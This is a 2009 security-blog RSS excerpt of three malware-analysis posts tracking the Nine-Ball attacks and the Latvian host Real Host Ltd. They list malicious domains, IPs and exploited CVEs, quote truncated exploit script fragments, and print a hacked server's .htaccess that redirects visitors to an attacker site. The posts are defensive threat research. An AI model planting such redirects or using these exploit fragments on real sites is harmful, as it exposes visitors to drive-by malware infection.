			<content:encoded><![CDATA[<p>A couple of days ago I was investigating an attack that a reader submitted to me that was related to the recent nine ball attacks as reported by WebSense. (<a title="nine ball attack follow up 1" href="http://www.martinsecurity.net/2009/07/28/nine-ball-followup-part-1/" target="_blank">Part 1</a> | <a class="wpGallery" title="nine ball attack follow up 2" href="http://www.martinsecurity.net/2009/07/29/nine-ball-followup-now-with-video-part-2/" target="_blank">Part 2</a>)</p>
<p>The attackers use the same techniques to exploit victims but this time have moved to new domains and updated their payloads. There are 2 payloads dropped on compromised hosts at the end of the attacks that steal banking credentials and send SPAM. These payloads are delivered by multiple exploits including  an unpatched 0day vulnerability and a previously unpatched one.</p>
<p>Directshow &#8211; MS09-028 (previously a 0day, patched recently)</p>
<p>function directshow()<br />
{<br />
var shellcode=unescape(&#8220;%uC033&#8230;.</p>
<p>obj.data=&#8217;./directshow.php&#8217;;<br />
obj.classid=&#8217;clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF&#8217;;</p>
<p>Microsoft Office Web Components (unpatched 0day)</p>
<p>function spreadsheet()<br />
{<br />
try<br />
{<br />
var objspread=new ActiveXObject(&#8216;OWC10.Spreadsheet&#8217;);<br />
}</p>
<p>After conducting further research on 71speed.info and finding it hosted by Real Host Ltd of Latvia it quickly became apparent how bad this host is. A quick search leads to a blog <a title="dynamoo blog" href="http://www.dynamoo.com/blog/2009/07/real-host-ltd-is-real-sewer.html" target="_blank">written by Dynamoo</a> where the activities of this host are first uncovered. Delving deeper into this provider  it is  apparent that they are a major hub of cybercrime activity which we will discuss further. This post has been prepared in conjunction with Jart Armin from <a title="hostexploit" href="http://hostexploit.com" target="_blank">HostExploit.com</a>. Jart will present a higher level view of Real Host&#8217;s activities in relation to other entities and most interestingly how they related to the former Russian Business Network (RBN).</p>
<p>It should be noted that many of these sites are no longer reachable due to swift efforts by registrar Directi.</p>
<p>Observed Hostile Activity:</p>
<ul>
<li>Exploits including unpatched (or soon to be patched) 0days</li>
<li>Payloads to drop on victim PCs including: fake codecs, banking trojans, spambots, fake anti virus, downloaders and even a Mac trojan</li>
<li>Phishing sites</li>
<li>Moneymule recruitment sites</li>
<li>Botnet Command and Control servers</li>
<li>Hosting of cybercrime websites &#8211; Iframe programs</li>
<li>Distributing licensed software (Warez)</li>
</ul>
<p>Real Host has 3 /28 IP blocks (48 IPs) that they get from  Junik (AS8206), these are:</p>
<p>inetnum: 213.182.197.0 &#8211; 213.182.197.15<br />
netname: Real_Host_NET3<br />
descr: Real Host<br />
country: LV<br />
abuse-mailbox: abuseemaildhcp@gmail.com</p>
<p>inetnum: 213.182.197.224 &#8211; 213.182.197.239<br />
netname: Real_Host_NET1<br />
descr: Real Host<br />
country: LV<br />
abuse-mailbox: abuseemaildhcp@gmail.com</p>
<p>inetnum: 213.182.197.240 &#8211; 213.182.197.255<br />
netname: Real_Host_NET2<br />
descr: Real Host<br />
country: LV<br />
abuse-mailbox: abusemailhost@gmail.com</p>
<p>The first indication of suspicious activity is the use of gmail addresses as abuse contacts.</p>
<p>Next, here is data from my security tools showing attacks and the dates associated with them:</p>
<table style="border-collapse: collapse; width: 463pt;" border="0" cellspacing="0" cellpadding="0" width="616">
<col style="width: 48pt;" width="64"></col>
<col style="width: 78pt;" width="104"></col>
<col style="width: 149pt;" width="198"></col>
<col style="width: 110pt;" width="146"></col>
<col style="width: 78pt;" width="104"></col>
<tbody>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt; width: 48pt;" width="64" height="17">Date</td>
<td style="width: 78pt;" width="104">IP</td>
<td style="width: 149pt;" width="198">Domain</td>
<td style="width: 110pt;" width="146">URL</td>
<td style="width: 78pt;" width="104">Purpose</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">5/6/2009</td>
<td>213.182.197.230</td>
<td>update.dom11z.cn</td>
<td>/</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/2/2009</td>
<td>213.182.197.227</td>
<td>test.corbsc.com</td>
<td>/splt/getpdf.php</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/4/2009</td>
<td>213.182.197.229</td>
<td>2k90.cn</td>
<td>/2/include/spl.php</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/5/2009</td>
<td>213.182.197.229</td>
<td>2k90.cn</td>
<td>/2/include/spl.php</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/10/2009</td>
<td>213.182.197.237</td>
<td>downloadoemsoftware.com</td>
<td>/exempl/include/spl.php</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/15/2009</td>
<td>213.182.197.237</td>
<td>downloadoemsoftware.com</td>
<td>/exempl/include/spl.php</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">7/10/2009</td>
<td>213.182.197.237</td>
<td>noplit.ws</td>
<td>/exempl/include/spl.php</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">7/10/2009</td>
<td>213.182.197.229</td>
<td>businessconsulting312.com</td>
<td>/bus_trf/1/pdf.php</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">7/10/2009</td>
<td>213.182.197.229</td>
<td>businessconsulting312.com</td>
<td>/bus_trf/1/pdf.php</td>
<td>Multiple Exploits</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">5/6/2009</td>
<td>213.182.197.23</td>
<td>lieliteautobody.cn</td>
<td>/load.php</td>
<td>Payloads</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">5/6/2009</td>
<td>213.182.197.23</td>
<td>lieliteautobody.cn</td>
<td>/load.php</td>
<td>Payloads</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/2/2009</td>
<td>213.182.197.227</td>
<td>test.corbsc.com</td>
<td>/splt/getexe.php</td>
<td>Payloads</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/6/2009</td>
<td>213.182.197.5</td>
<td>virus-detect-soft.com</td>
<td>/antivirus.exe</td>
<td>Payloads</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/6/2009</td>
<td>213.182.197.5</td>
<td>virus-detect-soft.com</td>
<td>/antivirus.exe</td>
<td>Payloads</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">6/10/2009</td>
<td>213.182.197.237</td>
<td>downloadoemsoftware.com</td>
<td>/exempl/load.php</td>
<td>Payloads</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17" align="right">7/18/2009</td>
<td>213.182.197.237</td>
<td>5fgh.ws</td>
<td>/expli/update.php</td>
<td>Payloads</td>
</tr>
</tbody>
</table>
<p>A little manual investigation led me to the following:</p>
<table style="border-collapse: collapse; width: 415pt;" border="0" cellspacing="0" cellpadding="0" width="552">
<col style="width: 78pt;" width="104"></col>
<col style="width: 149pt;" width="198"></col>
<col style="width: 110pt;" width="146"></col>
<col style="width: 78pt;" width="104"></col>
<tbody>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt; width: 78pt;" width="104" height="17">IP</td>
<td class="xl24" style="width: 149pt;" width="198">Domain</td>
<td class="xl24" style="width: 110pt;" width="146">Purpose</td>
<td class="xl24" style="width: 78pt;" width="104">More Information</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17">213.182.197.229</td>
<td class="xl24">yourgoogleanalytics.us</td>
<td class="xl24">Money Mule Recruiting<span> </span></td>
<td class="xl24"><a href="http://forums.layonara.com/just-fun/233792-oh-those-wacky-scam-artists.html" target="_blank">Link</a></td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17">213.182.197.229</td>
<td class="xl24">barwellsgroup.cn</td>
<td class="xl24">Money Mule Recruiting<span> </span></td>
<td class="xl24">Related to above</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl25" style="height: 12.75pt;" height="17">213.182.197.249</td>
<td class="xl24">Vikd3jj-3.com</td>
<td class="xl24">Malware</td>
<td class="xl24"></td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl25" style="height: 12.75pt;" height="17">213.182.197.251</td>
<td class="xl24">2k90.cn</td>
<td class="xl24">malware</td>
<td class="xl24"></td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl25" style="height: 12.75pt;" height="17">213.182.197.13</td>
<td class="xl24">Mac-videos.com</td>
<td class="xl24">Mac Trojan</td>
<td class="xl24"><a href="http://www.macfixitforums.com/ubbthreads.php/topics/474209/2/Google_Hijacked" target="_blank">Link</a></td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td class="xl24" style="height: 12.75pt;" height="17">213.182.197.236</td>
<td class="xl24">71speed.info</td>
<td class="xl24" colspan="2">Leads to Banking Trojan &#8211;   Silent Banker &amp; Spambot</td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.8</td>
<td class="xl26">bestxvids.info</td>
<td class="xl24">zlob</td>
<td class="xl24"><a href="http://myitforum.com/cs2/blogs/cmosby/archive/2008/06/17/malicious-doorways-redirecting-to-malware-dancho-danchev-s-blog-mind-streams-of-information-security-knowledge.aspx" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.249</td>
<td class="xl26">traffic-searches.cn</td>
<td class="xl26">botnet C&amp;C</td>
<td class="xl24"><a href="http://www.malwareurl.com/listing.php?domain=traffic-searches.cn" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.237</td>
<td class="xl26">1gigabayt.com</td>
<td class="xl24">Zeus C&amp;C</td>
<td class="xl24"><a href="https://zeustracker.abuse.ch/monitor.php?host=1gigabayt.com" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.14</td>
<td class="xl26">iframepartners.com</td>
<td class="xl24">iframe sellers</td>
<td></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20"><span> </span>213.182.197.228</td>
<td class="xl26">Chlenopopik.com</td>
<td class="xl24">Zeus C&amp;C</td>
<td><a href="https://zeustracker.abuse.ch/monitor.php?host=chlenopopik.com" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.14</td>
<td class="xl26">Megavipsite.cn</td>
<td>malware</td>
<td><a href="http://www.threatexpert.com/report.aspx?md5=d49779060bc9f04140d3a22ffe555951" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.20</td>
<td class="xl26">Traffcount.cn</td>
<td>malware</td>
<td><a href="http://www.honeynet.cz/domains/malicious.txt" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.229</td>
<td class="xl26">Newskyag.com</td>
<td>Money Mule Recruiting<span> </span></td>
<td><a href="http://answers.yahoo.com/question/index?qid=20070912090147AAqz16y" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td style="height: 15pt;" height="20"></td>
<td></td>
<td>Zeus C&amp;C</td>
<td><a href="https://zeustracker.abuse.ch/monitor.php?host=newskyag.com" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.235</td>
<td class="xl26">Traffic-exchange.ru</td>
<td>Part of iframe redirection service</td>
<td><a href="http://www.islandcrisis.net/2009/05/mygenerim-redirecting-spy-site-from-facebook/" target="_blank">Link</a></td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.10</td>
<td class="xl26">vlkontacte.ru</td>
<td colspan="2">Russian Social Network Phish</td>
</tr>
<tr style="height: 15pt;" height="20">
<td class="xl26" style="height: 15pt;" height="20">213.182.197.251</td>
<td class="xl26">Botnet.su</td>
<td>Zeus C&amp;C</td>
<td><a href="https://zeustracker.abuse.ch/monitor.php?host=botnet.su" target="_blank">Link</a></td>
</tr>
</tbody>
</table>
<p>The domain I found most amusing was botnet.su, the attackers clearly aren&#8217;t trying to hide their motives on this one! This domain was previously used by the RBN along with NewskyAG and others. More on this link can be found at hostexploit.com.</p>
<p>Zeus seems to be one of the most common threats being hosted from Real Host&#8217;s network. According to <a title="top 10 botnets" href="http://www.networkworld.com/news/2009/072209-botnets.html" target="_blank">recent information</a> released by Damballa, Zeus is the #1 botnet in the US with an estimated 3.6 million PCs compromised.</p>
<p>To begin, let&#8217;s look at the money mule sites the Barwells Group and NewskyAG, here is an excerpt from the link included above:</p>
<p>BarwellsGroup</p>
<p>&#8220;During the trial period (1 month), you will be paid 2000 USD per month<br />
while  working  on  average  3  hours  per day, Monday-Friday, plus 5<br />
commission from every transactions or task received and processed. The<br />
salary  will  be  sent  in  the form of wire transfer directly to your<br />
account.  After  the  trial  period your base pay salary will go up to<br />
3,500USD per month, plus 5 commission.&#8221;</p>
<p>Clearly this is a money mule recruitment program. Sounds pretty good for 3 hours work per day, maybe I should quit my day job!</p>
<p>NewskyAG</p>
<p>Not only does this domain operate a money mule scam, it also ran a Zeus C&amp;C server. What is scary is that people actually fall prey to this scheme as shown by this quote from yahoo answers:</p>
<p>Q: &#8220;Anyone ever heard of a company called NewSky Ag?&#8221;</p>
<p>A: &#8220;Yes I work for them from home and so far everything is ok but I&#8217;ve only been doing it about 2 months so if you have any more ? please let me know&#8221;</p>
<p>Next we have a phish for a Russian social networking site</p>
<p><a href="http://www.martinsecurity.net/wp-content/uploads/2009/07/phish.png"></a><a href="http://www.martinsecurity.net/wp-content/uploads/2009/07/phish2.png"><img class="alignnone size-medium wp-image-388" title="phish2" src="http://www.martinsecurity.net/wp-content/uploads/2009/07/phish2-300x281.png" alt="phish2" width="300" height="281" /></a></p>
<p>Lastly lets look at iframepartners.com, the site is currently down however information is still available. The site pays malicious web admins to put iframes on their compromised websites. A colleague of mine was kind enough to translate the text from Russian (thanks Alex!). It reads:</p>
<p class="MsoNormal" style="margin-left: 54pt; text-indent: -18pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;"><span>1.<span style="font-family: Times New Roman; font-size: xx-small;"><span style="font-family: 'Times New Roman'; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span></span></span><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">A partner pays for iframe traffic,  we accept only us, gb, it, au, and it will be in average from $1 to $20 for 1K  depending on traffic quality</span></span></p>
<p class="MsoNormal" style="margin-left: 54pt; text-indent: -18pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;"><span>2.<span style="font-family: Times New Roman; font-size: xx-small;"><span style="font-family: 'Times New Roman'; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span></span></span><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">We accept only ads that generate  more that 50K USA  traffic</span></span></p>
<p class="MsoNormal" style="margin-left: 54pt; text-indent: -18pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;"><span>3.<span style="font-family: Times New Roman; font-size: xx-small;"><span style="font-family: 'Times New Roman'; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span></span></span><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">You are prohibited to install  anything else with our iframe</span></span></p>
<p class="MsoNormal" style="margin-left: 54pt; text-indent: -18pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;"><span>4.<span style="font-family: Times New Roman; font-size: xx-small;"><span style="font-family: 'Times New Roman'; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span></span></span><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">Adult traffic is not  welcomed</span></span></p>
<p class="MsoNormal" style="margin-left: 54pt; text-indent: -18pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;"><span>5.<span style="font-family: Times New Roman; font-size: xx-small;"><span style="font-family: 'Times New Roman'; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span></span></span><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">An account will be deleted without  payout in case of detection of spam or worm traffic</span></span></p>
<p class="MsoNormal" style="margin-left: 54pt; text-indent: -18pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;"><span>6.<span style="font-family: Times New Roman; font-size: xx-small;"><span style="font-family: 'Times New Roman'; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span></span></span><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">We have been deleting accounts that  are not active for few days</span></span></p>
<p class="MsoNormal" style="margin-left: 54pt; text-indent: -18pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;"><span>7.<span style="font-family: Times New Roman; font-size: xx-small;"><span style="font-family: 'Times New Roman'; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span></span></span><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">Cheaters and hit-boters, please  don’t waste our time, look for other places</span></span></p>
<p class="MsoNormal" style="margin-left: 54pt; text-indent: -18pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;"><span>8.<span style="font-family: Times New Roman; font-size: xx-small;"><span style="font-family: 'Times New Roman'; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span></span></span><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">Payout twice a month, in the  beginning and in the middle of month<br />
Use XXX XXXXXX to contact  us</span></span></p>
<p>Notice how adult sites, worms and spam traffic is not allowed? This is probably due to the fact that they are very noisy and easily spotted by security professionals.</p>
<p>This leads to another  site called installing.cc. This site pays for installing malware onto compromised PCs.</p>
<p><a href="http://www.martinsecurity.net/wp-content/uploads/2009/07/installing.png"></a><a href="http://www.martinsecurity.net/wp-content/uploads/2009/07/installing1.png"><img class="alignnone size-medium wp-image-397" title="installing.cc" src="http://www.martinsecurity.net/wp-content/uploads/2009/07/installing1-260x300.png" alt="installing.cc" width="260" height="300" /></a></p>
<p>Another interesting hit comes up from a design company called web-alfa.com. They designed an eye catching flash banner advertisement for the attackers.</p>
<p><a href="http://www.martinsecurity.net/wp-content/uploads/2009/07/advert1.png"><img class="alignnone size-medium wp-image-398" title="real host advertisment" src="http://www.martinsecurity.net/wp-content/uploads/2009/07/advert1-300x296.png" alt="real host advertisment" width="300" height="296" /></a></p>
<p><a href="http://www.martinsecurity.net/wp-content/uploads/2009/07/advert.png"></a><a href="http://www.martinsecurity.net/wp-content/uploads/2009/07/advert1.png"><img class="alignnone size-medium wp-image-398" style="-moz-binding: url(chrome://global/content/bindings/general.xml#asdfzxcv);" title="advert1" src="http://www.martinsecurity.net/wp-content/uploads/2009/07/advert1-300x296.png" alt="advert1" width="300" height="296" /></a></p>
<p>The slides in the flash movie say:</p>
<p class="MsoNormal" style="margin-left: 36pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">Long-live  substitution,</span></span></p>
<p class="MsoNormal" style="margin-left: 36pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">And software  sale,</span></span></p>
<p class="MsoNormal" style="margin-left: 36pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">Referral  system,</span></span></p>
<p class="MsoNormal" style="margin-left: 36pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">And other life  enjoyments</span></span></p>
<p class="MsoNormal" style="margin-left: 36pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">For invitation and detailed  information contact us via XXX XXXXXX</span></span></p>
<p>Clearly Real Host Ltd is hosting major cybercrime activity as a vast number of IPs in their space host malicious content. Several of the domains hosted with them  were used by the former RBN. Real Host represents  a major threat to individuals, business and the safety of the Internet ecosystem.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/07/31/real-host-latvia-rbn-resurgence-or-clone/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Nine-Ball followup now with video! Part 2</title>
		<link>http://www.martinsecurity.net/2009/07/29/nine-ball-followup-now-with-video-part-2/</link>
		<comments>http://www.martinsecurity.net/2009/07/29/nine-ball-followup-now-with-video-part-2/#comments</comments>
		<pubDate>Wed, 29 Jul 2009 23:01:35 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Malware Binaries (exe/dll)]]></category>
		<category><![CDATA[Malware scripts and other formats]]></category>
		<category><![CDATA[Reverse Engineering]]></category>
		<category><![CDATA[gumblar]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[malzilla]]></category>
		<category><![CDATA[nineball]]></category>
		<category><![CDATA[silentbanker]]></category>
		<category><![CDATA[tedroo]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=371</guid>
		<description><![CDATA[As a follow up to my previous post, here is the next video depicting the second portion of the attack. For URLs, Virustotal results, etc refer back to Part 1. All analysis is conducted with Malzilla. www.youtube.com/watch?v=DNx9iMcRAQg To give you some additional insight into the attack, I am also able to share the contents of [...]]]></description>
			<content:encoded><![CDATA[<p>As a follow up to my previous post, here is the next video depicting the second portion of the attack. For URLs, Virustotal results, etc refer back to <a href="http://www.martinsecurity.net/2009/07/28/nine-ball-followup-part-1/" target="_blank">Part 1</a>. All analysis is conducted with Malzilla.</p>
<p><span class="youtube">
<object width="480" height="295">
<param name="movie" value="http://www.youtube.com/v/DNx9iMcRAQg?color1=d6d6d6&amp;color2=f0f0f0&amp;border=0&amp;fs=1&amp;hl=en&amp;autoplay=0&amp;showinfo=0&amp;iv_load_policy=3&amp;showsearch=0&amp;rel=1&amp;hd=1" />
<param name="allowFullScreen" value="true" />
<param name="allowscriptaccess" value="always">
<embed src="http://www.youtube.com/v/DNx9iMcRAQg?color1=d6d6d6&amp;color2=f0f0f0&amp;border=0&amp;fs=1&amp;hl=en&amp;autoplay=0&amp;showinfo=0&amp;iv_load_policy=3&amp;showsearch=0&amp;rel=1&amp;hd=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="480" height="295"></embed>
</object>
</span><p><a href="http://www.youtube.com/watch?v=DNx9iMcRAQg&fmt=18">www.youtube.com/watch?v=DNx9iMcRAQg</a></p></p>
<p>To give you some additional insight into the attack, I am also able to share the contents of a hacked server&#8217;s .htaccess file. The miscreants upload this file to automatically redirect visitors to a site under their control.</p>
<p>These lines will redirect all requests for 400,401,403,404 and 500 pages to ake.kz, the attacker controlled site.</p>
<p>ErrorDocument 400 http://ake.kz/in.cgi?8<br />
ErrorDocument 401 http://ake.kz/in.cgi?8<br />
ErrorDocument 403 http://ake.kz/in.cgi?8<br />
ErrorDocument 404 http://ake.kz/in.cgi?8<br />
ErrorDocument 500 http://ake.kz/in.cgi?8</p>
<p>The following entries check to see if a user has been referred to the compromised website by a search engine. If they have, they will be automatically forwarded on to the attacker&#8217;s site, ake.kz</p>
<p>RewriteEngine On<br />
RewriteCond %{HTTP_REFERER} .*google.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*ask.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*excite.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*msn.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*aol.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*goto.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*search.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*bing.* [OR]<br />
RewriteCond %{HTTP_REFERER} .*dogpile.*<br />
RewriteRule ^(.*)$ http://ake.kz/in.cgi?7 [R=301,L]</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/07/29/nine-ball-followup-now-with-video-part-2/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Nine-Ball followup now with video! Part 1</title>
		<link>http://www.martinsecurity.net/2009/07/28/nine-ball-followup-part-1/</link>
		<comments>http://www.martinsecurity.net/2009/07/28/nine-ball-followup-part-1/#comments</comments>
		<pubDate>Tue, 28 Jul 2009 22:24:07 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Malware Binaries (exe/dll)]]></category>
		<category><![CDATA[Malware scripts and other formats]]></category>
		<category><![CDATA[Reverse Engineering]]></category>
		<category><![CDATA[banking trojan]]></category>
		<category><![CDATA[gumblar]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[malzilla]]></category>
		<category><![CDATA[nineball]]></category>
		<category><![CDATA[silentbanker]]></category>
		<category><![CDATA[spambot]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=353</guid>
		<description><![CDATA[A reader was gracious enough to share some information with me on the events surrounding the compromise of a website of his. The site was compromised via stolen FTP credentials which has been a technique employed by major Internet threats such as Gumblar and Nine-ball recently. This will be a two part post. Lets take [...]]]></description>
			<content:encoded><![CDATA[<p>A reader was gracious enough to share some information with me on the events surrounding the compromise of a website of his. The site was compromised via stolen FTP credentials which has been a technique  employed by major Internet threats such as Gumblar and Nine-ball recently. This will be a two part post.</p>
<p>Lets take a look at what happens to the victim webserver after it gets compromised and the malware involved. To make this post more interesting I&#8217;ve decided to deliver my analysis via video! Rather than the standard nerve grating rock music that people tend to add to videos like this I have opted for my genre of choice, electronic <img src='http://www.martinsecurity.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> . I&#8217;ve included virus total results, domains involved, etc at the end of the post.</p>
<p>Sit back, relax and enjoy the ride.</p>
<p><span class="youtube">
<object width="480" height="295">
<param name="movie" value="http://www.youtube.com/v/9HdA1lC2PWM?color1=d6d6d6&amp;color2=f0f0f0&amp;border=0&amp;fs=1&amp;hl=en&amp;autoplay=0&amp;showinfo=0&amp;iv_load_policy=3&amp;showsearch=0&amp;rel=1&amp;hd=1" />
<param name="allowFullScreen" value="true" />
<param name="allowscriptaccess" value="always">
<embed src="http://www.youtube.com/v/9HdA1lC2PWM?color1=d6d6d6&amp;color2=f0f0f0&amp;border=0&amp;fs=1&amp;hl=en&amp;autoplay=0&amp;showinfo=0&amp;iv_load_policy=3&amp;showsearch=0&amp;rel=1&amp;hd=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="480" height="295"></embed>
</object>
</span><p><a href="http://www.youtube.com/watch?v=9HdA1lC2PWM&fmt=18">www.youtube.com/watch?v=9HdA1lC2PWM</a></p></p>
<p>Domains / URLs involved:</p>
<p>71speed.info<br />
xbx.tw/in.cgi?6<br />
xbx.tw/in.cgi?3<br />
zyejanag.cn/rf/<br />
fvuligir.cn/s/in.cgi?11<br />
84.244.138.58/ts/in.cgi?chtr&amp;5f9d90<br />
esli.tw/load.php?e=1<br />
esli.tw/2/index.php<br />
esli.tw/show.php?s=18f8bc6e98</p>
<p>Exploits Used:</p>
<p>MDAC -- MS06-014<br />
Adobe Acroat -- CVE-2008-2992 &amp; CVE-2009-0927<br />
Adobe Flash Player (not sure which one)<br />
